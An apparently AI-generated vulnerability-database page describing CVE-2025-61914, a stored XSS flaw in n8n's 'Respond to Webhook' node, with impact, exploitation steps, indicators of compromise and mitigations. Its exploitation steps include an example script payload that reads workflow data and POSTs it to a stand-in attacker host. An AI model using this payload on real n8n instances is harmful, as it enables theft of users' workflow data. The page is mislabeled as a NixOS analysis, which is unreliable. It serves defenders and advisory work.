CVE-2025-61914: 
NixOS vulnerability analysis and mitigation

Overview

CVE-2025-61914 is a stored Cross-Site Scripting (XSS) vulnerability in n8n's "Respond to Webhook" node that allows authenticated users with workflow creation permissions to execute arbitrary JavaScript in the n8n editor interface. The flaw affects all n8n versions prior to 1.114.0 (npm package). It was discovered by researcher nlgbao1340, published on December 26, 2025, and patched in the same release cycle. The GitHub Advisory Database rates this as High severity with a CVSS v3.1 score of 7.3, while Feedly's estimate places it at 5.4 (Medium) (Github Advisory, n8n Security Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where HTML content returned by the "Respond to Webhook" node is not properly sanitized before rendering. A sandbox mechanism was introduced in n8n v1.103.0 to isolate webhook responses within an iframe, but the vulnerability allows script payloads to escape this sandbox and execute directly in the top-level browser window — within the authenticated n8n editor context. Exploitation requires the attacker to have workflow creation permissions and requires a victim user to interact with the crafted webhook response (e.g., by previewing or triggering the workflow output). No public proof-of-concept code has been identified at this time (Github Advisory, n8n Security Advisory).

Impact

Successful exploitation enables an attacker to execute arbitrary JavaScript within the authenticated session of another n8n user, facilitating CSRF-like actions without requiring direct cookie theft (session cookies are HttpOnly). Concrete impacts include unauthorized reading of sensitive workflow data and execution history, unauthorized modification or deletion of workflows, and insertion of malicious workflow logic or external data exfiltration steps. n8n instances that permit untrusted users to create workflows are most at risk, as a low-privileged attacker can target higher-privileged users such as administrators (Github Advisory).

Exploitability

No known in-the-wild exploitation or weaponized exploit kits have been reported for CVE-2025-61914. The EPSS score is approximately 0.008% (1st percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires low privileges (workflow creation access) and user interaction, limiting opportunistic mass exploitation but making it relevant in multi-tenant or shared n8n deployments (Github Advisory).

Exploitation steps

  1. Gain workflow creation access: Obtain a low-privileged account on an n8n instance that allows untrusted users to create or modify workflows.
  2. Create a malicious workflow: Build a workflow that includes a "Respond to Webhook" node configured to return an HTML response containing an embedded JavaScript payload (e.g., <script>fetch('/api/workflows').then(r=>r.json()).then(d=>fetch('https://attacker.com/exfil',{method:'POST',body:JSON.stringify(d)}))</script>).
  3. Trigger sandbox escape: Craft the HTML response in a way that bypasses the iframe sandbox introduced in v1.103.0, causing the script to execute in the top-level window context of the n8n editor rather than within the sandboxed iframe.
  4. Lure a victim: Share the workflow or webhook URL with a higher-privileged user (e.g., an admin), or wait for them to preview/execute the workflow output within the n8n editor interface.
  5. Execute CSRF-like actions: Once the victim's browser renders the response, the injected JavaScript executes in their authenticated session, enabling reading of workflow data, modification/deletion of workflows, or exfiltration of sensitive automation logic to an attacker-controlled server (Github Advisory, n8n Security Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from the n8n server or user browsers to unknown external domains, particularly POST requests containing workflow data or JSON payloads originating from the n8n editor session.
  • Logs: n8n access logs showing webhook endpoint responses with Content-Type: text/html containing <script> tags; unusual API calls to /api/workflows or /api/executions endpoints immediately following webhook response rendering.
  • Workflow Artifacts: Newly created or modified workflows containing "Respond to Webhook" nodes with HTML body content embedding <script> tags or obfuscated JavaScript; unexpected changes to existing workflow logic (e.g., added HTTP Request nodes pointing to external URLs).
  • Process/Session Behavior: Authenticated API calls (workflow reads, modifications, deletions) occurring in rapid succession without corresponding user-initiated actions, suggesting scripted in-session activity.

Mitigation and workarounds

The vulnerability is patched in n8n v1.114.0 — upgrading to this version or later is the primary recommended remediation (Github Advisory). For organizations unable to upgrade immediately, the following workarounds apply:

  • Restrict workflow creation and modification privileges to trusted users only, preventing untrusted actors from crafting malicious webhook responses.
  • Avoid using untrusted or user-supplied HTML content in the "Respond to Webhook" node.
  • Deploy an external reverse proxy or HTML sanitizer (e.g., DOMPurify, a WAF rule) to strip executable scripts from webhook responses before they reach the n8n editor.

Community reactions

The advisory was published by n8n maintainer csuermann on December 26, 2025, and credited researcher nlgbao1340 for the discovery. The vulnerability was referenced in a CISA weekly vulnerability bulletin (week of December 22, 2025) and picked up by several security aggregators including Tenable, Red Hat CVE tracking, and INCIBE-CERT. No significant independent researcher commentary or social media discussion beyond automated CVE feeds has been identified (Github Advisory, CISA Bulletin).

Additional resources


Source: This report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103678HIGH8.1
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103680MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103679MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103497MEDIUM5.5
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026
CVE-2026-103496MEDIUM5.4
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management